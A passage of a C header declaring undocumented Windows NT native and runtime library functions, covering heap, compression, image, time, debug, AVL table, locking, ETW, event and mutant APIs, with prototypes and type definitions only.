NTSTATUS(NTAPI * PRTL_HEAP_COMMIT_ROUTINE)(\n _In_ PVOID Base,\n _Inout_ PVOID *CommitAddress,\n _Inout_ PSIZE_T CommitSize\n );\n\ntypedef struct _RTL_HEAP_PARAMETERS {\n ULONG Length;\n SIZE_T SegmentReserve;\n SIZE_T SegmentCommit;\n SIZE_T DeCommitFreeBlockThreshold;\n SIZE_T DeCommitTotalFreeThreshold;\n SIZE_T MaximumAllocationSize;\n SIZE_T VirtualMemoryThreshold;\n SIZE_T InitialCommit;\n SIZE_T InitialReserve;\n PRTL_HEAP_COMMIT_ROUTINE CommitRoutine;\n SIZE_T Reserved[2];\n} RTL_HEAP_PARAMETERS, *PRTL_HEAP_PARAMETERS;\n\n_Must_inspect_result_\nNTSYSAPI\nPVOID\nNTAPI\nRtlCreateHeap(\n _In_ ULONG Flags,\n _In_opt_ PVOID HeapBase,\n _In_ SIZE_T ReserveSize,\n _In_ SIZE_T CommitSize,\n _In_opt_ PVOID Lock,\n _In_opt_ PRTL_HEAP_PARAMETERS Parameters);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlDestroyHeap(\n _In_ PVOID HeapHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetHeapInformation(\n _In_opt_ PVOID HeapHandle,\n _In_ HEAP_INFORMATION_CLASS HeapInformationClass,\n _In_opt_ PVOID HeapInformation,\n _In_ SIZE_T HeapInformationLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlQueryHeapInformation(\n _In_ PVOID HeapHandle,\n _In_ HEAP_INFORMATION_CLASS HeapInformationClass,\n _Out_opt_ PVOID HeapInformation,\n _In_opt_ SIZE_T HeapInformationLength,\n _Out_opt_ PSIZE_T ReturnLength);\n\n_Must_inspect_result_\nNTSYSAPI\nPVOID\nNTAPI\nRtlAllocateHeap(\n _In_ PVOID HeapHandle,\n _In_ ULONG Flags,\n _In_ SIZE_T Size);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlFreeHeap(\n _In_ PVOID HeapHandle,\n _In_ ULONG Flags,\n _Frees_ptr_opt_ _Post_invalid_ PVOID BaseAddress);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlZeroHeap(\n _In_ PVOID HeapHandle,\n _In_ ULONG Flags);\n\nNTSYSAPI\nSIZE_T\nNTAPI\nRtlSizeHeap(\n _In_ PVOID HeapHandle,\n _In_ ULONG Flags,\n _In_ PVOID BaseAddress);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlProtectHeap(\n _In_ PVOID HeapHandle,\n _In_ BOOLEAN MakeReadOnly);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlReAllocateHeap(\n _In_ PVOID HeapHandle,\n _In_ ULONG Flags,\n _Frees_ptr_opt_ PVOID BaseAddress,\n _In_ SIZE_T Size);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlGetProcessHeaps(\n _In_ ULONG NumberOfHeaps,\n _Out_ PVOID *ProcessHeaps);\n\ntypedef NTSTATUS(NTAPI *PRTL_ENUM_HEAPS_ROUTINE)(\n _In_ PVOID HeapHandle,\n _In_ PVOID Parameter\n );\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlEnumProcessHeaps(\n _In_ PRTL_ENUM_HEAPS_ROUTINE EnumRoutine,\n _In_ PVOID Parameter);\n\n/************************************************************************************\n*\n* RTL Compression API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetCompressionWorkSpaceSize(\n _In_ USHORT CompressionFormatAndEngine,\n _Out_ PULONG CompressBufferWorkSpaceSize,\n _Out_ PULONG CompressFragmentWorkSpaceSize);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCompressBuffer(\n _In_ USHORT CompressionFormatAndEngine,\n _In_reads_bytes_(UncompressedBufferSize) PUCHAR UncompressedBuffer,\n _In_ ULONG UncompressedBufferSize,\n _Out_writes_bytes_to_(CompressedBufferSize, *FinalCompressedSize) PUCHAR CompressedBuffer,\n _In_ ULONG CompressedBufferSize,\n _In_ ULONG UncompressedChunkSize,\n _Out_ PULONG FinalCompressedSize,\n _In_ PVOID WorkSpace);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDecompressBuffer(\n _In_ USHORT CompressionFormat,\n _Out_writes_bytes_to_(UncompressedBufferSize, *FinalUncompressedSize) PUCHAR UncompressedBuffer,\n _In_ ULONG UncompressedBufferSize,\n _In_reads_bytes_(CompressedBufferSize) PUCHAR CompressedBuffer,\n _In_ ULONG CompressedBufferSize,\n _Out_ PULONG FinalUncompressedSize);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDecompressBufferEx(\n _In_ USHORT CompressionFormat,\n _Out_writes_bytes_to_(UncompressedBufferSize, *FinalUncompressedSize) PUCHAR UncompressedBuffer,\n _In_ ULONG UncompressedBufferSize,\n _In_reads_bytes_(CompressedBufferSize) PUCHAR CompressedBuffer,\n _In_ ULONG CompressedBufferSize,\n _Out_ PULONG FinalUncompressedSize,\n _In_ PVOID WorkSpace);\n\n/************************************************************************************\n*\n* RTL Image API.\n*\n************************************************************************************/\n\n#define RTL_IMAGE_NT_HEADER_EX_FLAG_NO_RANGE_CHECK (0x00000001)\n\nNTSYSAPI\nPIMAGE_NT_HEADERS\nNTAPI\nRtlImageNtHeader(\n _In_ PVOID Base);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlImageNtHeaderEx(\n _In_ ULONG Flags,\n _In_ PVOID Base,\n _In_ ULONG64 Size,\n _Out_ PIMAGE_NT_HEADERS * OutHeaders);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlAddressInSectionTable(\n _In_ PIMAGE_NT_HEADERS NtHeaders,\n _In_ PVOID BaseOfImage,\n _In_ ULONG VirtualAddress);\n\nNTSYSAPI\nPIMAGE_SECTION_HEADER\nNTAPI\nRtlSectionTableFromVirtualAddress(\n _In_ PIMAGE_NT_HEADERS NtHeaders,\n _In_ PVOID BaseOfImage,\n _In_ ULONG VirtualAddress);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlImageDirectoryEntryToData(\n _In_ PVOID BaseOfImage,\n _In_ BOOLEAN MappedAsImage,\n _In_ USHORT DirectoryEntry,\n _Out_ PULONG Size);\n\nNTSYSAPI\nPIMAGE_SECTION_HEADER\nNTAPI\nRtlImageRvaToSection(\n _In_ PIMAGE_NT_HEADERS NtHeaders,\n _In_ PVOID Base,\n _In_ ULONG Rva);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlImageRvaToVa(\n _In_ PIMAGE_NT_HEADERS NtHeaders,\n _In_ PVOID Base,\n _In_ ULONG Rva,\n _Inout_opt_ PIMAGE_SECTION_HEADER *LastRvaSection);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlFindExportedRoutineByName(\n _In_ PVOID BaseOfImage,\n _In_ PSTR RoutineName);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGuardCheckLongJumpTarget(\n _In_ PVOID PcValue,\n _In_ BOOL IsFastFail,\n _Out_ PBOOL IsLongJumpTarget);\n\n/************************************************************************************\n*\n* RTL Time API.\n*\n************************************************************************************/\n\nNTSYSAPI\nVOID\nNTAPI\nRtlSecondsSince1970ToTime(\n _In_ ULONG ElapsedSeconds,\n _Out_ PLARGE_INTEGER Time);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlTimeToSecondsSince1970(\n _In_ PLARGE_INTEGER Time,\n _Out_ PULONG ElapsedSeconds);\n\n\nNTSYSAPI\nVOID\nNTAPI\nRtlSecondsSince1980ToTime(\n _In_ ULONG ElapsedSeconds,\n _Out_ PLARGE_INTEGER Time);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlTimeToSecondsSince1980(\n _In_ PLARGE_INTEGER Time,\n _Out_ PULONG ElapsedSeconds);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlTimeToTimeFields(\n _In_ PLARGE_INTEGER Time,\n _Out_ PTIME_FIELDS TimeFields);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlTimeFieldsToTime(\n _In_ PTIME_FIELDS TimeFields,\n _Out_ PLARGE_INTEGER Time);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSystemTimeToLocalTime(\n _In_ PLARGE_INTEGER SystemTime,\n _Out_ PLARGE_INTEGER LocalTime);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlLocalTimeToSystemTime(\n _In_ PLARGE_INTEGER LocalTime,\n _Out_ PLARGE_INTEGER SystemTime);\n\nNTSYSAPI\nULONGLONG\nNTAPI\nRtlGetSystemTimePrecise(\n VOID);\n\nNTSYSAPI\nLARGE_INTEGER\nNTAPI\nRtlGetInterruptTimePrecise(\n _Out_ PLARGE_INTEGER PerformanceCounter);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlQueryUnbiasedInterruptTime(\n _Out_ PLARGE_INTEGER InterruptTime);\n\nNTSYSAPI\nKSYSTEM_TIME\nNTAPI\nRtlGetSystemTimeAndBias(\n _Out_ KSYSTEM_TIME TimeZoneBias,\n _Out_opt_ PLARGE_INTEGER TimeZoneBiasEffectiveStart,\n _Out_opt_ PLARGE_INTEGER TimeZoneBiasEffectiveEnd);\n\n/************************************************************************************\n*\n* RTL Debug Support API.\n*\n************************************************************************************/\n\nNTSYSAPI\nULONG\nSTDAPIVCALLTYPE\nDbgPrint(\n _In_z_ _Printf_format_string_ PCCH Format,\n ...);\n\nNTSYSAPI\nULONG\nSTDAPIVCALLTYPE\nDbgPrintEx(\n _In_ ULONG ComponentId,\n _In_ ULONG Level,\n _In_z_ _Printf_format_string_ PCCH Format,\n ...);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nDbgQueryDebugFilterState(\n _In_ ULONG ComponentId,\n _In_ ULONG Level);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nDbgSetDebugFilterState(\n _In_ ULONG ComponentId,\n _In_ ULONG Level,\n _In_ BOOLEAN State);\n\nNTSYSAPI\nVOID\nNTAPI\nDbgUserBreakPoint(\n VOID);\n\nNTSYSAPI\nVOID\nNTAPI\nDbgBreakPoint(\n VOID);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nDbgUiConnectToDbg(\n VOID);\n\nNTSYSAPI\nVOID\nNTAPI\nDbgUiSetThreadDebugObject(\n _In_ HANDLE DebugObject);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nDbgUiContinue(\n _In_ PCLIENT_ID AppClientId,\n _In_ NTSTATUS ContinueStatus);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nDbgUiStopDebugging(\n _In_ HANDLE Process);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nDbgUiDebugActiveProcess(\n _In_ HANDLE Process);\n\nNTSYSAPI\n_Success_(return != 0)\nUSHORT\nNTAPI\nRtlCaptureStackBackTrace(\n _In_ ULONG FramesToSkip,\n _In_ ULONG FramesToCapture,\n _Out_writes_to_(FramesToCapture, return) PVOID* BackTrace,\n _Out_opt_ PULONG BackTraceHash);\n\n/************************************************************************************\n*\n* RTL AVL Tree API.\n*\n************************************************************************************/\n\ntypedef enum _TABLE_SEARCH_RESULT {\n TableEmptyTree,\n TableFoundNode,\n TableInsertAsLeft,\n TableInsertAsRight\n} TABLE_SEARCH_RESULT;\n\ntypedef enum _RTL_GENERIC_COMPARE_RESULTS {\n GenericLessThan,\n GenericGreaterThan,\n GenericEqual\n} RTL_GENERIC_COMPARE_RESULTS;\n\n//\n// Add an empty typedef so that functions can reference the\n// a pointer to the generic table struct before it is declared.\n//\n\n#if defined (__cplusplus)\nstruct _RTL_AVL_TABLE;\n#else\ntypedef struct _RTL_AVL_TABLE RTL_AVL_TABLE;\ntypedef struct PRTL_AVL_TABLE *_RTL_AVL_TABLE;\n#endif\n\ntypedef RTL_GENERIC_COMPARE_RESULTS(NTAPI *PRTL_AVL_COMPARE_ROUTINE)(\n _In_ struct _RTL_AVL_TABLE *Table,\n _In_ PVOID FirstStruct,\n _In_ PVOID SecondStruct\n );\n\ntypedef PVOID(NTAPI *PRTL_AVL_ALLOCATE_ROUTINE)(\n _In_ struct _RTL_AVL_TABLE *Table,\n _In_ ULONG ByteSize\n );\n\ntypedef VOID(NTAPI *PRTL_AVL_FREE_ROUTINE)(\n _In_ struct _RTL_AVL_TABLE *Table,\n _In_ _Post_invalid_ PVOID Buffer\n );\n\ntypedef NTSTATUS(NTAPI *PRTL_AVL_MATCH_FUNCTION)(\n _In_ struct _RTL_AVL_TABLE *Table,\n _In_ PVOID UserData,\n _In_ PVOID MatchData\n );\n\ntypedef struct _RTL_BALANCED_LINKS {\n struct _RTL_BALANCED_LINKS *Parent;\n struct _RTL_BALANCED_LINKS *LeftChild;\n struct _RTL_BALANCED_LINKS *RightChild;\n CHAR Balance;\n UCHAR Reserved[3];\n} RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS;\n\ntypedef struct _RTL_AVL_TABLE {\n RTL_BALANCED_LINKS BalancedRoot;\n PVOID OrderedPointer;\n ULONG WhichOrderedElement;\n ULONG NumberGenericTableElements;\n ULONG DepthOfTree;\n PRTL_BALANCED_LINKS RestartKey;\n ULONG DeleteCount;\n PRTL_AVL_COMPARE_ROUTINE CompareRoutine;\n PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine;\n PRTL_AVL_FREE_ROUTINE FreeRoutine;\n PVOID TableContext;\n} RTL_AVL_TABLE, *PRTL_AVL_TABLE;\n\nNTSYSAPI\nVOID\nNTAPI\nRtlInitializeGenericTableAvl(\n _Out_ PRTL_AVL_TABLE Table,\n _In_ PRTL_AVL_COMPARE_ROUTINE CompareRoutine,\n _In_ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine,\n _In_ PRTL_AVL_FREE_ROUTINE FreeRoutine,\n _In_opt_ PVOID TableContext);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlInsertElementGenericTableAvl(\n _In_ PRTL_AVL_TABLE Table,\n _In_reads_bytes_(BufferSize) PVOID Buffer,\n _In_ CLONG BufferSize,\n _Out_opt_ PBOOLEAN NewElement);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlInsertElementGenericTableFullAvl(\n _In_ PRTL_AVL_TABLE Table,\n _In_reads_bytes_(BufferSize) PVOID Buffer,\n _In_ CLONG BufferSize,\n _Out_opt_ PBOOLEAN NewElement,\n _In_ PVOID NodeOrParent,\n _In_ TABLE_SEARCH_RESULT SearchResult);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlDeleteElementGenericTableAvl(\n _In_ PRTL_AVL_TABLE Table,\n _In_ PVOID Buffer);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlLookupElementGenericTableAvl(\n _In_ PRTL_AVL_TABLE Table,\n _In_ PVOID Buffer);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlLookupElementGenericTableFullAvl(\n _In_ PRTL_AVL_TABLE Table,\n _In_ PVOID Buffer,\n _Out_ PVOID *NodeOrParent,\n _Out_ TABLE_SEARCH_RESULT *SearchResult);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlEnumerateGenericTableAvl(\n _In_ PRTL_AVL_TABLE Table,\n _In_ BOOLEAN Restart);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlEnumerateGenericTableWithoutSplayingAvl(\n _In_ PRTL_AVL_TABLE Table,\n _Inout_ PVOID *RestartKey);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlLookupFirstMatchingElementGenericTableAvl(\n _In_ PRTL_AVL_TABLE Table,\n _In_ PVOID Buffer,\n _Out_ PVOID *RestartKey);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlEnumerateGenericTableLikeADirectory(\n _In_ PRTL_AVL_TABLE Table,\n _In_opt_ PRTL_AVL_MATCH_FUNCTION MatchFunction,\n _In_opt_ PVOID MatchData,\n _In_ ULONG NextFlag,\n _Inout_ PVOID *RestartKey,\n _Inout_ PULONG DeleteCount,\n _In_ PVOID Buffer);\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlGetElementGenericTableAvl(\n _In_ PRTL_AVL_TABLE Table,\n _In_ ULONG I);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlNumberGenericTableElementsAvl(\n _In_ PRTL_AVL_TABLE Table);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlIsGenericTableEmptyAvl(\n _In_ PRTL_AVL_TABLE Table);\n\n/************************************************************************************\n*\n* RTL Critical Section Support API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlEnterCriticalSection(\n _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlLeaveCriticalSection(\n _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\nNTSYSAPI\nLOGICAL\nNTAPI\nRtlIsCriticalSectionLocked(\n _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\nNTSYSAPI\nLOGICAL\nNTAPI\nRtlIsCriticalSectionLockedByThread(\n _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlGetCriticalSectionRecursionCount(\n _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\nNTSYSAPI\nLOGICAL\nNTAPI\nRtlTryEnterCriticalSection(\n _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlInitializeCriticalSection(\n _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlEnableEarlyCriticalSectionEventCreation(\n VOID);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlInitializeCriticalSectionAndSpinCount(\n _In_ PRTL_CRITICAL_SECTION CriticalSection,\n _In_ ULONG SpinCount);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlSetCriticalSectionSpinCount(\n _In_ PRTL_CRITICAL_SECTION CriticalSection,\n _In_ ULONG SpinCount);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDeleteCriticalSection(\n _In_ PRTL_CRITICAL_SECTION CriticalSection);\n\n/************************************************************************************\n*\n* RTL SRW Lock Support API.\n*\n************************************************************************************/\n\nNTSYSAPI\nVOID\nNTAPI\nRtlInitializeSRWLock(\n _Out_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlAcquireSRWLockExclusive(\n _Inout_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlAcquireSRWLockShared(\n _Inout_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlReleaseSRWLockExclusive(\n _Inout_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlReleaseSRWLockShared(\n _Inout_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlTryAcquireSRWLockExclusive(\n _Inout_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlTryAcquireSRWLockShared(\n _Inout_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlAcquireReleaseSRWLockExclusive(\n _Inout_ PRTL_SRWLOCK SRWLock);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlUpdateClonedSRWLock(\n _Inout_ PRTL_SRWLOCK SRWLock,\n _In_ LOGICAL Shared);\n\n/************************************************************************************\n*\n* RTL UAC Support API.\n*\n************************************************************************************/\n\n#define DBG_FLAG_ELEVATION_ENABLED 1\n#define DBG_FLAG_VIRTUALIZATION_ENABLED 2\n#define DBG_FLAG_INSTALLER_DETECT_ENABLED 3\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlQueryElevationFlags(\n _Inout_ ULONG *ElevationFlags);\n\n/************************************************************************************\n*\n* RTL Misc Support API.\n*\n************************************************************************************/\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlDoesFileExists_U(\n _In_ PCWSTR FileName);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlGetLongestNtPathLength(\n VOID);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlAreLongPathsEnabled(\n VOID);\n\n/************************************************************************************\n*\n* RTL Boundary Descriptor API.\n*\n************************************************************************************/\n\nNTSYSAPI\nPVOID\nNTAPI\nRtlCreateBoundaryDescriptor(\n _In_ PUNICODE_STRING Name,\n _In_ ULONG Flags);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlDeleteBoundaryDescriptor(\n _In_ _Post_invalid_ PVOID BoundaryDescriptor);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddSIDToBoundaryDescriptor(\n _Inout_ PVOID *BoundaryDescriptor,\n _In_ PSID RequiredSid);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAddIntegrityLabelToBoundaryDescriptor(\n _Inout_ PVOID *BoundaryDescriptor,\n _In_ PSID IntegrityLabel);\n\n/************************************************************************************\n*\n* RTL work item/async IO.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlQueueWorkItem(\n _In_ WORKERCALLBACKFUNC Function,\n _In_ PVOID Context,\n _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlSetIoCompletionCallback(\n _In_ HANDLE FileHandle,\n _In_ APC_CALLBACK_FUNCTION CompletionProc,\n _In_ ULONG Flags);\n\n/************************************************************************************\n*\n* RTL data exports.\n*\n************************************************************************************/\n\n#ifndef _M_X64\n#define RtlNtdllName L\"ntdll.dll\"\n#define RtlDosPathSeperatorsString ((UNICODE_STRING)RTL_CONSTANT_STRING(L\"\\\\/\"))\n#define RtlAlternateDosPathSeperatorString ((UNICODE_STRING)RTL_CONSTANT_STRING(L\"/\"))\n#define RtlNtPathSeperatorString ((UNICODE_STRING)RTL_CONSTANT_STRING(L\"\\\\\"))\n#else\nNTSYSAPI PWSTR RtlNtdllName;\nNTSYSAPI UNICODE_STRING RtlDosPathSeperatorsString;\nNTSYSAPI UNICODE_STRING RtlAlternateDosPathSeperatorString;\nNTSYSAPI UNICODE_STRING RtlNtPathSeperatorString;\n#endif\n\n/************************************************************************************\n*\n* ETW API.\n*\n************************************************************************************/\n\ntypedef VOID(NTAPI *PETWENABLECALLBACK)(\n _In_ LPCGUID SourceId,\n _In_ ULONG IsEnabled,\n _In_ UCHAR Level,\n _In_ ULONGLONG MatchAnyKeyword,\n _In_ ULONGLONG MatchAllKeyword,\n _In_opt_ /*EVENT_FILTER_DESCRIPTOR*/ PVOID FilterData,\n _Inout_opt_ PVOID CallbackContext\n );\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nEtwEventRegister(\n _In_ LPCGUID ProviderId,\n _In_opt_ PETWENABLECALLBACK EnableCallback,\n _In_opt_ PVOID CallbackContext,\n _Out_ PREGHANDLE RegHandle);\n\nNTSYSAPI\nULONG\nNTAPI\nEtwEventWriteNoRegistration(\n _In_ LPCGUID ProviderId,\n _In_ /*PCEVENT_DESCRIPTOR*/ PVOID EventDescriptor,\n _In_ ULONG UserDataCount,\n _In_reads_opt_(UserDataCount) /*PEVENT_DATA_DESCRIPTOR*/PVOID UserData);\n\n\n/*\n** Runtime Library API END\n*/\n\n/*\n** Native API START\n*/\n\n/************************************************************************************\n*\n* System Information API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nWINAPI\nNtQuerySystemInformation(\n _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,\n _Out_writes_bytes_opt_(SystemInformationLength) PVOID SystemInformation,\n _In_ ULONG SystemInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQuerySystemInformationEx(\n _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,\n _In_reads_bytes_(InputBufferLength) PVOID InputBuffer,\n _In_ ULONG InputBufferLength,\n _Out_writes_bytes_opt_(SystemInformationLength) PVOID SystemInformation,\n _In_ ULONG SystemInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetSystemInformation(\n _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,\n _In_reads_bytes_opt_(SystemInformationLength) PVOID SystemInformation,\n _In_ ULONG SystemInformationLength);\n\n/************************************************************************************\n*\n* Event (EventPair) API.\n*\n************************************************************************************/\n\ntypedef enum _EVENT_INFORMATION_CLASS {\n EventBasicInformation\n} EVENT_INFORMATION_CLASS;\n\ntypedef enum _EVENT_TYPE {\n NotificationEvent,\n SynchronizationEvent\n} EVENT_TYPE;\n\ntypedef struct _EVENT_BASIC_INFORMATION {\n EVENT_TYPE EventType;\n LONG EventState;\n} EVENT_BASIC_INFORMATION, *PEVENT_BASIC_INFORMATION;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateEvent(\n _Out_ PHANDLE EventHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ EVENT_TYPE EventType,\n _In_ BOOLEAN InitialState);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenEvent(\n _Out_ PHANDLE EventHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetEvent(\n _In_ HANDLE EventHandle,\n _Out_opt_ PLONG PreviousState);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetEventEx(\n _In_ HANDLE ThreadId,\n _In_opt_ PRTL_SRWLOCK Lock);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtClearEvent(\n _In_ HANDLE EventHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtResetEvent(\n _In_ HANDLE EventHandle,\n _Out_opt_ PLONG PreviousState);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtPulseEvent(\n _In_ HANDLE EventHandle,\n _Out_opt_ PLONG PreviousState);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenKeyedEvent(\n _Out_ PHANDLE KeyedEventHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryEvent(\n _In_ HANDLE EventHandle,\n _In_ EVENT_INFORMATION_CLASS EventInformationClass,\n _Out_writes_bytes_(EventInformationLength) PVOID EventInformation,\n _In_ ULONG EventInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateEventPair(\n _Out_ PHANDLE EventPairHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenEventPair(\n _Out_ PHANDLE EventPairHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetLowEventPair(\n _In_ HANDLE EventPairHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetHighEventPair(\n _In_ HANDLE EventPairHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWaitLowEventPair(\n _In_ HANDLE EventPairHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtWaitHighEventPair(\n _In_ HANDLE EventPairHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetLowWaitHighEventPair(\n _In_ HANDLE EventPairHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetHighWaitLowEventPair(\n _In_ HANDLE EventPairHandle);\n\n/************************************************************************************\n*\n* Mutant API.\n*\n************************************************************************************/\n\ntypedef enum _MUTANT_INFORMATION_CLASS {\n MutantBasicInformation,\n MutantOwnerInformation\n} MUTANT_INFORMATION_CLASS;\n\ntypedef struct _MUTANT_BASIC_INFORMATION {\n LONG CurrentCount;\n BOOLEAN OwnedByCaller;\n BOOLEAN AbandonedState;\n} MUTANT_BASIC_INFORMATION, *PMUTANT_BASIC_INFORMATION;\n\ntypedef struct _MUTANT_OWNER_INFORMATION {\n CLIENT_ID ClientId;\n} MUTANT_OWNER_INFORMATION, *PMUTANT_OWNER_INFORMATION;\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateMutant(\n _Out_ PHANDLE MutantHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n _In_ BOOLEAN InitialOwner);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenMutant(\n _Out_ PHANDLE MutantHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryMutant(\n _In_ HANDLE MutantHandle,\n _In_ MUTANT_INFORMATION_CLASS MutantInformationClass,\n _Out_writes_bytes_(MutantInformationLength) PVOID MutantInformation,\n _In_ ULONG MutantInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtReleaseMutant(\n _In_ HANDLE MutantHandle,\n _Out_opt_ PLONG PreviousCount);\n\n/************************************************************************************\n*\n* Timer API.\n*\n************************************************************************************/\n\ntypedef VOID(*PTIMER_APC_ROUTINE) (\n _In_ PVOID TimerContext,\n _In_ ULONG TimerLowValue,\n _In_ LONG TimerHighValue\n );\n\ntypedef enum 